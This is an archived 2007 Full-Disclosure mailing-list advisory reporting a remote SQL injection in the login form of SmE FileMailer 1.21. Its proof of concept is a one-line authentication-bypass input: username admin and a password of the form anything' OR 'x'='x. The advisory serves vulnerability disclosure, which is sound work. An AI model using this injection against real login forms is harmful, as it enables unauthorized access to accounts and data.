corrado.liottaalice.it
Date: Tue Jan 16 2007 - 12:19:36 CST

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-=[--------------------ADVISORY-------------------]=-
                                              
                  SmE FileMailer 1.21
                                               
  Author: CorryL [corryl80gmail.com]
-=[-----------------------------------------------]=-

-=[+] Application: SmE FileMailer
-=[+] Version: 1.21
-=[+] Vendor's URL: http://www.scriptme.com/down/13
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: sql injection
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org
-=[+] Virtual Office: http://www.kasamba.com/CorryL
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck

..::[ Descriprion ]::..

SMe FileMailer lets you require visitors to submit their name and email address in order to retrieve a file from your site. Upon submitting the information, the link for file is sent to the visitor via email. This is a great way to stop leeching and third-party linking of your files, and it also lets you know exactly who's obtaining your files!

..::[ Proof Of Concept ]::..

In the login form insert

Login: admin

Password: anything' OR 'x'='x

..::[ Disclousure Timeline ]::..

 [16/01/2007] - Public disclousure

**************
Registrati ad Alice Basic e scarica Alice Messenger,
il nuovo instant messenger che ti fa chattare GRATIS con i tuoi amici!
Per maggiori informazioni vai su:
http://adsl.alice.it/servizi/alicebasic.html?pmk=psmail_foot01

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]